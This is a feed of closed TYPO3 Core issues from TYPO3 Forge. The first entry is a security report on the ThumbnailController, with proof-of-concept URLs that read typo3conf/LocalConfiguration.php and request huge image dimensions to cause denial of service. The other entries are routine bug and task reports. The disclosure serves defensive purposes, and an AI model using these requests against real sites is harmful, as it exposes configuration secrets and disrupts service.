TYPO3 Forge: Issueshttp://forge.typo3.org/http://forge.typo3.org/themes/typo3_forge/favicon/favicon.png?17058661692018-08-16T18:33:06ZTYPO3 Forge
Redmine TYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailControllerhttp://forge.typo3.org/issues/858752018-08-16T18:33:06ZOliver Haderoliver.hader@typo3.org
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not released yet to 9.4.0 nor 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2 >PoC<a href="#PoC" class="wiki-anchor">¶</a></h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3 >Information Disclosure<a href="#Information-Disclosure" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3 >Denial of Service<a href="#Denial-of-Service" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre> TYPO3 Core - Task #69369 (Closed): EXT:form - Use property value instead of data for TEXTAREA, TE...http://forge.typo3.org/issues/693692015-08-27T17:02:52ZOliver Haderoliver.hader@typo3.org
<p>The Form Objects (system extension "form") TEXTAREA, TEXTBLOCK, OPTION currently use <code>data</code> as property name to define default values. However, all other objects use <code>value</code>. Since <code>data</code> implies the possibility to use computed values, it shall be deprecated and <code>value</code> used instead.</p> TYPO3 Core - Bug #54857 (Closed): Test extensions are not considered in functional test caseshttp://forge.typo3.org/issues/548572014-01-09T00:12:28ZOliver Haderoliver.hader@typo3.org
<p>The functional testing framework offers the possibility to define custom extension to be installed for each test scenario.<br />However, this does not work at all, only extensions that are available in the original base installation can be used.</p>
<p>The origin of this misbehaviour can be found in this change set:<br /><a class="external" href="https://review.typo3.org/#/c/19605/32/typo3/sysext/core/Tests/FunctionalTestCaseBootstrapUtility.php">https://review.typo3.org/#/c/19605/32/typo3/sysext/core/Tests/FunctionalTestCaseBootstrapUtility.php</a></p> TYPO3 Core - Bug #52585 (Closed): Overwriting exiting database during install does not workhttp://forge.typo3.org/issues/525852013-10-07T16:34:30ZOliver Haderoliver.hader@typo3.org
<p>It sounds nice that existing data cannot be overwritten anymore... however, if it's intended and the database user is not allowed to create new databases, then one is lost after the first 10 seconds with TYPO3.</p>
Steps to reproduce:
<ul>
<li>install TYPO3 CMS 6.2</li>
<li>use user that has a database with data/tables</li>
<li>you won't find the database in the list of "empty databases" - which is correct of course, but not helpful</li>
</ul> TYPO3 Core - Bug #52578 (Closed): Install process removes permissionhttp://forge.typo3.org/issues/525782013-10-07T13:59:57ZOliver Haderoliver.hader@typo3.org
<p>The initial server error reads like this:</p>
<p>Forbidden<br />You don't have permission to access /typo3/sysext/install/Start/Install.php on this server.</p>
<p>The permission to the document root folder is modified and thus TYPO3 is currently locking out itself during the install process.<br />Looks like $GLOBALS['TYPO3_CONF_VARS']['BE']['folderCreateMask'] is used as targetPermission...<br />So, either leave out the root node or find a way to determine the correct permission.</p>
<p>In my case I get a<br /><code>Permission denied: /.../introduction/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable, referer: http://.../typo3/sysext/install/Start/Install.php</code></p> TYPO3 Core - Bug #47969 (Closed): Call to undefined function mime_content_type()http://forge.typo3.org/issues/479692013-05-06T09:21:53ZOliver Haderoliver.hader@typo3.org
<p>Call to undefined function mime_content_type() on fetching the mime type of the favicon.<br />I'm still investigating the PHP versions and environment. However it looks like a superfluous regression from <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Make mimetype-detection possible without finfo_file (pre-PHP-5.3, no pecl-fileinfo) (Closed)" href="http://forge.typo3.org/issues/46126">#46126</a></p> TYPO3 Core - Bug #47145 (Closed): TypoScript stripProfile not forwarded to ProcessedFilehttp://forge.typo3.org/issues/471452013-04-11T23:47:12ZOliver Haderoliver.hader@typo3.org
<p>The TypoScript stripProfile feature not forwarded to<br />ProcessedFile anymore. Example of the feature that has<br />been available in TYPO3 CMS 4.x:</p>
<p><code>10 = IMAGE<br />10.file = fileadmin/images/image1.jpg<br />10.file.stripProfile = 1</code></p>
<p>The protected method modifyImageMagickStripProfileParameters() <br />does not make any sense anymore since the actual ImageMagick<br />processing has been moved around in TYPO3 CMS 6.0.</p> TYPO3 Core - Bug #46530 (Closed): Crop-Scaled images have wrong file content typehttp://forge.typo3.org/issues/465302013-03-22T09:57:25ZOliver Haderoliver.hader@typo3.org
The following scenario is given:
<ul>
<li>resize a 300dpi TIFF image to PNG using stdWrap/cObj</li>
<li>the 'fileExtension' configuration is not set ($fileArray['ext'] is empty)</li>
<li>the processed file csm_... has the file extension PNG</li>
<li>but the file content type is still TIFF, so the file was just renamed, but not converted to PNG</li>
</ul>
<p>Solution:<br />Since the processing task determines the accordant filename and file extension, the image processor (ImageMagick, ...) needs to know about that fact as well.</p> TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actionshttp://forge.typo3.org/issues/462052013-03-12T15:30:34ZOliver Haderoliver.hader@typo3.org
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler an I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p> TYPO3 Core - Bug #34546 (Closed): Records with same UID but different tables are not shownhttp://forge.typo3.org/issues/345462012-03-05T22:33:55ZOliver Haderoliver.hader@typo3.org
<p>Records with same UID but different tables are not shown in the Workspace Module.<br />The ExtJS setting "idProperty" needs to point to a unique value.</p> TYPO3 Core - Feature #31767 (Closed): Integrate accessible content renderinghttp://forge.typo3.org/issues/317672011-11-12T11:31:49ZOliver Haderoliver.hader@typo3.org
<p>Integrate accessible content rendering to the frontend.</p>
<p>These changes are a result of the BLE project and are taken from<br />git://git.typo3.org/TYPO3v4/Incubator.git project-accessibility</p>
<pre>
git merge --squash --no-commit ed780a59b42b39dc85b37a46fb1ba03938ac4ca6
git cherry-pick eb77a4890a27075f970e96b0fcef0d4d088d4ad4 --no-commit
git cherry-pick 6238dcf224d5a3deb1744db1d81959e6609bfed6 --no-commit
git cherry-pick 16541a886146a56a8d9797466183c3788c107fbe --no-commit
</pre> TYPO3 Core - Task #31274 (Closed): Disable file upload in form wizardhttp://forge.typo3.org/issues/312742011-10-25T12:24:00ZOliver Haderoliver.hader@typo3.org
<p>Due to a wrong implementation the file upload feature in the form wizard will be disbled for the time being.</p> TYPO3 Core - Bug #31249 (Closed): Caching tables of new extensions are not createdhttp://forge.typo3.org/issues/312492011-10-25T00:34:19ZOliver Haderoliver.hader@typo3.org
<p>Creating the caching tables of an extension that has been installed in the same process does not work.<br />Since the cachingConfiguration of the new extension is not forwarded to the cache manager, the new tables are just not know there.</p> TYPO3 Core - Bug #31246 (Closed): Internal extension information is not updated properlyhttp://forge.typo3.org/issues/312462011-10-24T23:53:12ZOliver Haderoliver.hader@typo3.org
<p>tx_em_Tools::refreshGlobalExtList() is triggered on installing extensions. However the current implementation is wrong (early return) and does not consider $TYPO3_CONF_VARS.</p>
<p>This misbehavior also prevents the Introduction Package to correctly install accordant cf_* tables of workspaces and extbase, since the information in $TYPO3_CONF_VARS is not available globally.</p> TYPO3 Core - Bug #31120 (Closed): Add default csc-mailform DIV wraphttp://forge.typo3.org/issues/311202011-10-19T18:59:47ZOliver Haderoliver.hader@typo3.org
<p>A new form element does not have any class settings.<br />This issue reintroduces stdWrap possibilites for the new form system extension.</p>